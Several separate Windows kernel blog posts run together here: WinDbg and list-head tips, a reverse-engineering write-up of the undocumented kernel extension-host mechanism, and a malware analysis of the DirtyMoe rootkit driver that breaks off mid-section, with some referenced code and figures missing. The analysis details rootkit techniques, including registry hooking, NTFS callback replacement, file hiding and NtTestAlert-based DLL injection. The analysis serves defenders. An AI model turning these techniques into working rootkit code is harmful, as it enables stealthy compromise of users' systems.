So that’s the end of our WinDbg series! All the scripts in this series will be uploaded to a github repo, as well as some new ones not included here. I suggest you investigate this data model further, because we didn’t even cover all the different methods it contains. Write cool tools of your own and share them with the world :)

And as long as this guide was, these are not even all the possible options in the new data model. And I didn’t even mention the new support for Javascript! You can get more information about using Javascript in WinDbg and the new and exciting support for TTD (time travel debugging) in this excellent post.

Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forget to advance them in a list and get stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn’t start iterating over the list from its head, but from a random item, without knowing there my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and want to get the value of Process->DiskCounters->BytesRead for each process:

This should work fine for any normal process:

But what will happen when we reach the list head?

The list head is not a part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read these and might try to use them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:

Windows RS3 added the useful RtlPcToFileName function, that makes our code a bit prettier:

Yes, More Callbacks — The Kernel Extension Mechanism

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yes, More Callbacks — The Kernel Extension Mechanism was originally published in Yarden_Shafir on Medium, where people are continuing the conversation by highlighting and responding to this story.

DirtyMoe: Rootkit Driver

11 August 2021 at 09:44

Abstract

In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is hook method provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds a specific driver name to the
listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel
GetCellRoutine().
0x222004 The malware sends a process ID that wants to terminate. The driver calls kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8 The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes
used variable: filePath, fileData
Table 3. Controlling IOCTLs
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
WinDeviceName
WinDeviceNameB
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknow
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

